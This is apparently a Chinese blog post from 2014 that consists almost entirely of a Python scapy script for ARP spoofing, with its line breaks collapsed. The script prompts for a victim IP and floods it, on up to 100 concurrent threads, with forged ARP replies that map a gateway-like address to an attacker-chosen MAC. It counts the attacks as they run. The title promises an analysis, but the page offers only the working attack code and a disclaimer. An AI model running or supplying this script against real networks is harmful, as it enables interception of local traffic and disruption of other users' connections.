Posted in Python onJanuary 16, 2014
# -*- coding: cp936 -*- from scapy.all import * from threading import Thread,Lock,activeCount BROADCASTMAC = getmacbyip('192.168.0.120') class Loop(Thread): def __init__(self,ip): Thread.__init__(self) self.ip = ip def run(self): global BROADCASTMAC arp = ARP() arp.psrc = '192.168.0.251' arp.hwsrc = BROADCASTMAC arp.pdst = self.ip arp.op = 2 sr1(arp,verbose = 0,retry = 0,timeout = 3) class Main(Thread): def __init__(self,ip): Thread.__init__(self) self.ip = ip def run(self): limit = 100 total = 0 while True: if activeCount() < limit: Loop(self.ip).start() total = total + 1 print '目前已进行了ARP攻击的次数为:'+str(total) if __name__ == '__main__': ip = raw_input('请输入要进行ARP攻击的机器IP:') Main(ip = ip).start()
python发送arp欺骗攻击代码分析
声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。
Reply on: @reply_date@
@reply_contents@